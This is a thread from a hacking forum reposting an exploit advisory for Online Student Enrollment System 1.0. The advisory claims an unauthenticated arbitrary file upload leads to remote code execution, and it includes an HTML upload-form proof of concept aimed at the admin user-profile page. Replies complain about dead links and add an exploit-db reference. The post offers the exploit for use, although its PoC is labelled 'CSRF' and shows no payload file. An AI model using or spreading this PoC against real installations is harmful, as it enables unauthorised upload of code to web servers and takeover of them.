![]() |
|
Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking) +--- Thread: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload (/Thread-Online-Student-Enrollment-System-1-0-Unauthenticated-Arbitrary-File-Upload) |
Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload - SCARIO - 04-14-2021 # Exploit Title: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload # Google Dork: N/A # Vendor Homepage: https://www.campcodes.com/projects/p...in-php-mysqli/ # Software Link: https://www.sourcecodester.com/sites...rollment_1.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Online Student Enrollment System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. #CSRF PoC: <html> <body> <form action="http://localhost/student_enrollment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data"> <input type="file" name="userphoto" required="" id="photo"><br> <input class="btn btn-info" type="submit" name="upphoto" value="Upload Photo"> </form> </body> </html> Quote:Original Link to the Exploit! RE: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload - xVita - 04-14-2021 Both links are dead !!!!! RE: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload - tschaikowsky - 04-15-2021 (04-14-2021, 07:13 PM)xVita Wrote: Both links are dead !!!!!Original Link to the Exploit! https://www.exploit-db.com/exploits/48610 |